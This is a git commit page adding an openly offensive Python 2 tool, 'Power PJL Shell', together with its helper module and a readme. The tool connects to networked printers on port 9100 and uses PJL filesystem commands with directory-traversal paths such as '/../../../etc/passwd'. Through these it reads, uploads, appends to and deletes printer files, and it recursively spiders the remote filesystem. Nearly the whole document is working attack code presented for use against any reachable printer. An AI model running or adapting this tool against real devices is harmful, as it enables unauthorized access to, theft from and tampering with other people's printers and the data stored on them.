dash/pjl-tool
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

initial

Browse Source
This commit is contained in:
root
2015-05-30 13:40:06 +02:00
commit aaea3013a7
3 changed files with 996 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

582
pjl-shell.py Executable file
View File

@@ -0,0 +1,582 @@
#!/usr/bin/env python
#
# printer hacking again in 2012
# classic 10years after :>
import os
import sys
import pjl_func
def usage():
version = '0.3'
print "Power PJL Shell by dash"
print "~pwn some printers baby, version %s" % version
print
print
print "<host> [<port>]"
def help():
#default fs commands
print "Power PJL Shell"
print
print "PJL Commands:"
print "cd <path> - change directory to path"
print "ls - list current directory"
print "dir - list current directory"
print "get <file> - get a file from printer"
print "put <file> - put file to printer"
print "del <file> - delete file from printer"
print "cat <file> - cat a file"
print "drive <drive> - change to drive(0,1,2,...)"
print "mkdir <dirname> - create directory(not working?)"
print "append <file> - append data to a file on printer"
print
#default info commands
print "PJL Infos:"
print "infosys - print filesystem information"
print "infoconf - print config information"
print "infomem - info memory"
print "infoid - info id"
print "infostat - info status"
print "infovars - info variables"
print "infoustat - info ustatus (buggy?!)"
print
#network commands
print "Connection Options:"
print "open <printer> <port>- create new connection"
print "close - close connection"
print "exit - leave the shell"
print
#special commands
print "Special Commands:"
print "!r00tdir - traverse to / of printer"
print "!passwd - print password file"
print "spider <dir> - spider printer"
print "!hackinfo - show important data"
print
print "Host Commands:"
print "!ls - print files in ."
print "!id - show id of the current user"
print "!! <cmd> - execute abitrary command"
print
def prompt(pjl):
print "pjl@%s>" % (pjl.path),
try:
cmd = raw_input()
except KeyboardInterrupt:
cmd=""
print "\nPlease use Exit"
return cmd
def parseCmd(cmd):
print "Command: %s" % cmd
c = cmd.split(' ')
return c
def executeCmd(pjl,cmd):
print "Execute: %s" % cmd
cmd0=cmd[0]
if cmd0=="!ls":
buf = os.listdir(".")
for entry in buf:
print entry
elif cmd0=="!id":
buf = os.getuid()
print buf
elif cmd0=="!!":
os.system(cmd[1])
elif cmd0 == "help":
help()
elif cmd0 == "?":
help()
elif cmd0 == "infosys":
infoFilesys(pjl)
elif cmd0 == "infoconf":
infoConf(pjl)
elif cmd0 == "infomem":
infoMem(pjl)
elif cmd0 == "infoid":
infoId(pjl)
elif cmd0 == "infostatus":
infoStatus(pjl)
elif cmd0 == "infovars":
infoVars(pjl)
elif cmd0 == "infoustat":
infoUStat(pjl)
elif cmd0 == "exit":
print "Cya"
elif cmd0 == "open":
#closing the connection
pjl.s.close()
#connecting
print "Connecting: %s:%d" % (cmd[1], int(cmd[2]))
pjl.host=cmd[1]
pjl.port=int(cmd[2])
openConnection(pjl)
elif cmd0 == "close":
pjl.s.close()
elif cmd0 == "drive":
if len(cmd)<2:
print "drive <which>"
else:
pjl.drive=cmd[1]
elif cmd0 == "stat":
if len(cmd)<2:
print "stat <what>"
return
fsQuery(pjl,cmd[1])
elif cmd0 == "mkdir":
if len(cmd)<2:
print "mkdir <dir>"
else:
if cmd[1] != ".." and cmd[1]!=".":
pjl.dFile=pjl.path+cmd[1]
fsMkdir(pjl)
else:
print "Sorry .. / . not allowed"
elif cmd0 == "get":
if len(cmd)<2:
print "get <file>"
else:
if cmd[1] != ".." and cmd[1]!=".":
pjl.size=99999999
pjl.dFile=pjl.path+cmd[1]
fsUpload(pjl)
else:
print "Sorry .. / . not allowed"
elif cmd0 == "cat":
if len(cmd)<2:
print "cat <file>"
else:
if cmd[1] != ".." and cmd[1]!=".":
pjl.size=99999999
pjl.dFile=pjl.path+cmd[1]
catFile(pjl)
else:
print "Sorry .. / . not allowed"
elif cmd0 == "spider":
if len(cmd)<2:
print "spider <dir>"
else:
if cmd[1] != ".." and cmd[1]!=".":
pjl.size=99999999
pjl.dFile=pjl.path+cmd[1]
save3 = pjl.lDir
save2 = pjl.dFile
save = pjl.path
pjl.walkTree(pjl.dFile)
pjl.path=save
pjl.dFile = save2
pjl.lDir = save3
else:
print "Sorry .. / . not allowed"
elif cmd0 == "put":
if len(cmd)<2:
print "put <file>"
else:
if cmd[1] != ".." and cmd[1]!=".":
pjl.size=99999999
pjl.dFile=pjl.path+cmd[1]
pjl.hFile=cmd[1]
print "Put: [%s]" % pjl.dFile
fsDownload(pjl)
else:
print "Sorry .. / . not allowed"
elif cmd0 == "append":
if len(cmd)<3:
print "append <file> <printerfile>"
else:
if (cmd[1] != ".." and cmd[1]!=".") and (cmd[2]) != ".." and cmd[2] != ".":
pjl.size=99999999
pjl.dFile=pjl.path+cmd[2]
pjl.hFile=cmd[1]
print "Put: [%s] to [%s]" % (pjl.hFile,pjl.dFile)
fsAppend(pjl)
else:
print "Sorry .. / . not allowed"
elif cmd0 == "del":
if len(cmd)<2:
print "del <file>"
else:
if cmd[1] != ".." and cmd[1]!=".":
pjl.size=99999999
pjl.dFile=pjl.path+cmd[1]
fsDelete(pjl)
else:
print "Sorry .. / . not allowed"
elif cmd0 == "dir" or cmd0 == "ls":
if len(cmd)<2:
fsDirlist(pjl,pjl.lDir)
else:
saveD = pjl.lDir
d = pjl.lDir+cmd[1]
fsDirlist(pjl,d)
pjl.lDir=saveD
# elif cmd0 == "ls":
# if len(cmd)<2:
# fsDirlist(pjl,pjl.lDir)
# else:
# saveD = pjl.lDir
# d = pjl.lDir+cmd[1]
# fsDirlist(pjl,d)
# pjl.lDir=saveD
elif cmd0 == "cd":
if len(cmd)<2:
pjl.lDir=pjl.home
pjl.path=pjl.lDir
else:
saveD = pjl.lDir
#here i should check with fsquery if is a dir and i have
#permissions to access it
if cmd[1] == '.':
print "Ok, i stay here."
return
if cmd[1] == '..':
tmp = pjl.lDir.split('/')
print len(tmp)
print tmp
a=""
for it in range(len(tmp)):
#concat as long as its not the last entry
#as we want to remove it :)
if it+2 != len(tmp):
#print it
a = "%s%s/" % (a,tmp[it])
a = a.replace('//','/')
pjl.lDir = a
pjl.path = pjl.lDir
return
elif cmd[1].find('/') == -1:
pjl.lDir = pjl.lDir+cmd[1]+"/"
pjl.path = pjl.lDir
else:
pjl.lDir = pjl.lDir+cmd[1]
pjl.path = pjl.lDir
#if fsquery says its not accessable
#pjl.lDir=saveD
else:
print "Nothing Baby!"
usage()
pjl = pjl_func.pjl_commands()
if len(sys.argv)<1:
usage()
elif len(sys.argv)==2:
host = sys.argv[1]
pjl.host = host
elif len(sys.argv)==3:
host = sys.argv[1]
port = int(sys.argv[2])
pjl.host = host
pjl.port = port
else:
print "Erm. What ya doing??"
usage()
sys.exit(-1)
pjl.saveData="tmp-download.file"
def openConnection(pjl):
pjl.createSocket(pjl.host,pjl.port)
return 0
def infoConf(pjl):
pjl.buildRequest("infoconf")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
print "Target: %s" % (pjl.host)
print "Buffer: %s" % pjl.rBuf
return 0
def infoFilesys(pjl):
pjl.buildRequest("infofsys")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
print "Target: %s" % (pjl.host)
print "Buffer: %s" % pjl.rBuf
pjl.parseFSQUERY()
return 0
def infoMem(pjl):
pjl.buildRequest("infomem")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
print "Target: %s" % (pjl.host)
print "Buffer: %s" % pjl.rBuf
return 0
def infoUStat(pjl):
pjl.buildRequest("infoustat")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
print "Target: %s" % (pjl.host)
print "Buffer: %s" % pjl.rBuf
return 0
def infoVars(pjl):
pjl.buildRequest("infovars")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
print "Target: %s" % (pjl.host)
print "Buffer: %s" % pjl.rBuf
return 0
def infoStatus(pjl):
pjl.buildRequest("infostatus")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
print "Target: %s" % (pjl.host)
print "Buffer: %s" % pjl.rBuf
return 0
def infoId(pjl):
pjl.buildRequest("infoid")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
print "Target: %s" % (pjl.host)
print "Buffer: %s" % pjl.rBuf
return 0
def fsDownload(pjl):
#check for local file
ss = os.stat(pjl.hFile)
ssize = ss[6]
print "Filesize: %d" % ssize
pjl.upSize=ssize
pjl.size=ssize
pjl.loadFile()
pjl.buildRequest("fsdownload")
pjl.sendRequest(pjl.req)
pjl.size=ssize
#delete buffer
pjl.sBuf=""
#put the data
pjl.sendRequestSelect()
print len(pjl.rBuf)
return 0
def fsDelete(pjl):
pjl.buildRequest("fsquery")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
pjl.parseFSQUERY()
print pjl.dFile
print pjl.size
print pjl.drive
pjl.buildRequest("fsdelete")
pjl.sendRequest(pjl.req)
pjl.size=9999999
return 0
def catFile(pjl):
pjl.buildRequest("fsquery")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
pjl.parseFSQUERY()
if pjl.error==1:
print "Error, file not exist/accessable."
return
if pjl.ftype == "DIR":
return
pjl.downSize=pjl.size
pjl.buildRequest("fsupload")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
#delete buffer
pjl.rBuf=""
#get the data
pjl.recvRequestSelect()
print len(pjl.rBuf)
pjl.parseRequest()
print "Cat:\n%s" % pjl.rBuf
return 0
def fsUpload(pjl):
pjl.buildRequest("fsquery")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
pjl.parseFSQUERY()
if pjl.error==1:
print "Error, file not exist/accessable."
return
pjl.downSize=pjl.size
pjl.buildRequest("fsupload")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
#delete buffer
pjl.rBuf=""
#get the data
pjl.recvRequestSelect()
print len(pjl.rBuf)
save = pjl.dFile.replace('/','_')
pjl.saveData=save
pjl.saveFile()
return 0
def fsAppend(pjl):
ss = os.stat(pjl.hFile)
ssize = ss[6]
print "Filesize: %d" % ssize
pjl.upSize=ssize
pjl.size=ssize
pjl.loadFile()
pjl.buildRequest("fsappend")
pjl.sendRequest(pjl.req)
pjl.size=ssize
pjl.sBuf=""
#put the data
pjl.sendRequestSelect()
print len(pjl.rBuf)
def fsQuery(pjl,dFile):
pjl.dFile=dFile
pjl.buildRequest("fsquery")
pjl.sendRequest(pjl.req)
pjl.size=9999999
pjl.recvRequest()
pjl.parseRequest()
print "Target: %s" % (pjl.host)
print "Buffer: %s" % pjl.rBuf
pjl.parseFSQUERY()
return 0
def fsMkdir(pjl):
pjl.buildRequest("fsmkdir")
pjl.sendRequest(pjl.req)
pjl.size=9999999
return 0
def fsDirlist(pjl,lDir):
pjl.lDir=lDir
pjl.buildRequest("fsdirlist")
pjl.sendRequest(pjl.req)
pjl.size=9999999
#pjl.recvRequestSelectNormal()
pjl.recvRequest()
pjl.parseRequest()
print "Target: %s" % (pjl.host)
print "Buffer: %s" % pjl.rBuf
return 0
def initShell(pjl):
openConnection(pjl)
infoFilesys(pjl)
getDrive(pjl)
changeDirectory(pjl)
listDirectory(pjl)
def putFile(pjl, lfile, rfile):
print "implement me"
cmd=""
while cmd!="exit":
openConnection(pjl)
cmd=prompt(pjl)
cmddata=parseCmd(cmd)
result = executeCmd(pjl,cmddata)
pjl.s.close()

403
pjl_func.py Normal file
View File

@@ -0,0 +1,403 @@
import os
import sys
import socket
import select
class pjl_commands(object):
def __init__(self):
self.host="127.0.0.1"
self.port=9100
self.s = ""
self.req = ""
self.cnt = 0
self.rBuf = ""
self.sBuf = ""
self.drive = "0:"
self.hFile = "test.txt"
self.dFile = "/../../../etc/passwd"
self.lDir = "/../../../"
self.path = "/../../../"
self.home = "/../../../"
self.ftype = ""
self.size = 999999999
self.downSize = 0
self.upSize = 0
self.saveData = "tmp.download.file"
self.fileBuf = ""
self.error=0
self.errortype=0
def printError(self):
"""whoohooo my own error function, believe me it is AWESOME!!"""
if self.errortype == 0:
print "Alright!"
elif self.errortype == 1:
print "Uhm."
else:
print "Unknown Errorcode: %d" % (self.errortype)
def createSocket(self, host, port):
""" create the socket """
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
self.s = s
return
except socket.error,e:
print "%s" % e
return
def sendRequest(self,command):
""" send the request """
pjlS = "@PJL\r\n"
try:
self.s.send(pjlS)
self.s.send(command)
except socket.error, e:
print "Error: %s" % e
return
def recvRequest(self):
""" recv the data from the request and put it into a buffer """
self.rBuf=self.s.recv(self.size)
def sendRequestSelect(self):
""" send Data """
outputs = [self.s]
sdata = 0
while len(outputs)>0:
if sdata >= self.upSize:
#if len(self.sBuf) >= self.upSize:
print "Finished"
break
print "while %d" % len(outputs)
try:
inputrdy,outputrdy,exceptrdy = select.select([],outputs,[])
except select.error, e:
break
except socket.error, e:
break
for canidate in outputrdy:
if canidate == self.s:
print "send"
data = self.s.send(self.fileBuf)
#laenge wichtig hier
#self.sBuf=self.sBuf+data
sdata = sdata + data
if not data:
print "input: %d" % (len(self.sBuf))
print "sdata: %d" % sdata
break
#print "data: %d" % (len(data))
escE = "\r\n\x1b%-12345X"
self.s.send(escE)
def recvRequestSelectNormal(self):
""" recv the data from the request and put it into a buffer """
running = 1
inputs = [self.s]
while running:
# print "while %d" % len(inputs)
try:
inputrdy,outputrdy,exceptrdy = select.select(inputs,inputs,[])
#inputrdy,outputrdy,exceptrdy = select.select(inputs,[],[])
except select.error, e:
break
except socket.error, e:
break
for canidate in outputrdy:
if canidate == self.s:
break
for canidate in inputrdy:
if canidate == self.s:
print "recv"
data = self.s.recv(1024)
if data:
self.rBuf=self.rBuf+data
else:
return
# print "input: %d" % (len(self.rBuf))
# print "data: %d" % (len(data))
def recvRequestSelect(self):
""" recv the data from the request and put it into a buffer """
running = 1
inputs = [self.s]
while len(inputs)>0:
if len(self.rBuf) >= self.downSize:
print "Finished"
break
# print "while %d" % len(inputs)
try:
inputrdy,outputrdy,exceptrdy = select.select(inputs,[],[])
except select.error, e:
break
except socket.error, e:
break
for canidate in inputrdy:
if canidate == self.s:
# print "recv"
data = self.s.recv(1024)
if data:
self.rBuf=self.rBuf+data
# print "input: %d" % (len(self.rBuf))
# print "data: %d" % (len(data))
def parseRequest(self):
""" pre-parse the request and remove control-sequences """
self.rBuf = self.rBuf.replace('\x0c','')
def buildRequest(self, request):
""" put together the request to send """
#sequences
escS = "\x1b%-12345X@PJL "
escE = "\r\n\x1b%-12345X"
#commands
infoid = "INFO ID"
infofsys = "INFO FILESYS"
infoconf = "INFO CONFIG"
infomem = " INFO MEMORY"
infopcount = "INFO PAGECOUNT"
infostatus = "INFO STATUS"
infovars = "INFO VARIABLES"
infoustatus = "INFO USTATUS"
fsdownload = "FSDOWNLOAD FORMAT:BINARY NAME = "
fsdirlist = "FSDIRLIST NAME = "
fsupload = "FSUPLOAD NAME = "
fsquery = "FSQUERY NAME = "
fsmkdir = "FSMKDIR NAME = "
fsappend = "FSAPPEND FORMAT:BINARY NAME = "
fsdelete = "FSDELETE NAME = "
ustatuson = "USTATUS"
ustatusoff = "USTATUSOFF"
rdymsg = "RDYMSG DISPLAY = "
opmsg = "OPMSG DISPLAY = "
stmsg = "STMSG DISPLAY = "
if request=="infofsys":
self.req = "%s%s%s" % (escS,infofsys,escE)
elif request=="getDrive":
self.req = "%s%s%s" % (escS,infofsys,escE)
elif request=="infoconf":
self.req = "%s%s%s" % (escS,infoconf,escE)
elif request=="infoid":
self.req = "%s%s%s" % (escS,infoid,escE)
elif request=="infomem":
self.req = "%s%s%s" % (escS,infomem,escE)
elif request=="infostatus":
self.req = "%s%s%s" % (escS,infostatus,escE)
elif request=="infovars":
self.req = "%s%s%s" % (escS,infovars,escE)
elif request=="infoustat":
self.req = "%s%s%s" % (escS,infoustatus,escE)
elif request=="fsdirlist":
self.req = "%s%s\"%s%s\" ENTRY=1 COUNT=999999999%s" % (escS,fsdirlist,self.drive,self.lDir ,escE)
elif request=="fsquery":
self.req = "%s%s\"%s%s\"%s" % (escS,fsquery,self.drive,self.dFile,escE)
elif request=="fsupload":
self.req = "%s%s\"%s%s\" OFFSET=0 SIZE=%d %s" % (escS,fsupload,self.drive,self.dFile,self.size,escE)
elif request=="fsdownload":
self.req = "%s%s\"%s%s\" SIZE=%d\r\n" % (escS,fsdownload,self.drive,self.dFile,self.size)
elif request=="fsappend":
self.req = "%s%s\"%s%s\" SIZE=%d\r\n" % (escS,fsappend,self.drive,self.dFile,self.size)
elif request=="fsmkdir":
self.req = "%s%s\"%s%s\"%s" % (escS,fsmkdir,self.drive,self.dFile,escE)
elif request=="fsdelete":
self.req = "%s%s\"%s%s\"%s" % (escS,fsdelete,self.drive,self.dFile,escE)
def parseFSQUERY(self):
""" find type and size of file or dir or not exists"""
data = self.rBuf
print "Respone: %s" % data
#check for error
ferror = data.find('FILEERROR')
if ferror>=0:
self.error=1
return -1
else:
self.error=0
#find type
ftype = data.find('TYPE=')
print ftype
ftypeE = data.find(' ',ftype)
ftype = data[ftype+5:ftypeE]
self.ftype = ftype
self.ftype = self.ftype.replace('\r','')
self.ftype = self.ftype.replace('\n','')
#self.ftype = self.ftype.rstrip()
print "Filetype: [%s]" % self.ftype
if self.ftype == "FILE":
s1 = data.find('SIZE=')
s2 = data.find('\r\n')
sz = data[(s1+5):s2]
try:
self.size = int(sz)
except ValueError:
print "Dang, recv buffer to small for dir, just reseting self.size"
self.size=99999999
print "SIZE: [%d]" % self.size
def loadFile(self):
#remove last byte
fr = open(self.hFile,"r")
self.fileBuf = fr.read()
fr.close()
print "fileBuf: %d" % (len(self.fileBuf))
def saveFile(self):
#remove last byte
self.rBuf = self.rBuf[0:-1]
fw = open(self.saveData,"w")
fw.write(self.rBuf)
fw.close()
def parseGetDrive(self):
""" get the current drive from the filesys info
attention only one drive added, possible more drives not
taken care of """
print "implement me"
def spiderSaveLog(self,lDir,rlist,logname):
"""save spider data to logfile """
print "lDir: %s" % lDir
print "rlist: %s" % rlist
fw = open(logname,'a')
print len(rlist)
if len(rlist) == 1:
write="%s\n" % (lDir)
fw.write(write)
for item in rlist:
if item != '':
write="%s/%s\n" % (lDir, item)
fw.write(write)
fw.close()
def buildListdir(self,lDir):
"""sub-function for fslistdir"""
dirWalk=[]
self.lDir=lDir
self.buildRequest("fsdirlist")
self.sendRequest(self.req)
self.size=9999999
self.recvRequest()
self.parseRequest()
rlist = self.rBuf.split('\r\n')
#print rlist
rlist.pop(0)
rlist.pop(0)
rlist.pop(0)
# print rlist
print "Dirlisting:"
self.spiderSaveLog(lDir,rlist,self.host+'.log.txt')
for item in rlist:
print item
for item in rlist:
f1 = item.find('TYPE=DIR')
if f1 >= 0:
i0 = item.split(' ')
dirWalk.append(i0[0])
print dirWalk
return dirWalk
def checkAccess(self, entry):
self.lDir=entry
self.buildRequest("fsdirlist")
self.sendRequest(self.req)
self.size=9999999
self.recvRequest()
self.parseRequest()
#check for error
ferror = self.rBuf.find('FILEERROR')
if ferror>=0:
self.error=1
return -1
else:
self.error=0
# print "buff: %s" % self.rBuf
def checkFileType(self, entry):
"""check the filetype"""
print "checkFileType"
self.dFile = entry
self.buildRequest("fsquery")
self.sendRequest(self.req)
self.size=99999999
self.recvRequest()
self.parseRequest()
self.parseFSQUERY()
print "Type: [%s]" % (self.ftype)
return self.ftype
def walkTree(self,edir):
"""tree walk function, for walking remote directories"""
self.cnt+=1
self.checkAccess(edir)
self.checkFileType(edir)
if self.ftype != "DIR":
print "Not directory, End"
return
elif self.error == 1:
print "Fileerror"
return
print "Absolute Path: %s" % self.dFile
#self.buildListdir(self.dFile)
saveDir=self.dFile
for file in [ file for file in self.buildListdir(self.dFile)]:
self.dFile=saveDir
print "File: %s " % file
print "dFile: %s" % self.dFile
print "Path: %s" % self.path
nfile = self.dFile+'/'+file
print "nFile: %s" % nfile
self.checkAccess(nfile)
if self.error!=1:
if self.checkFileType(nfile) == "DIR":
print "got DIR!!"
#return
self.walkTree(nfile)
#print "Finished Spider"
return

11
readme.txt Normal file
View File

@@ -0,0 +1,11 @@
intro
=====
well not a lot to say here.
just connect to a printer which has port 9100 running :)
btw. for background information go to the research done by phenoelit ppl, fx and ftr ~2000.
http://www.phenoelit.org/fr/tools.html
ch33rs!
dash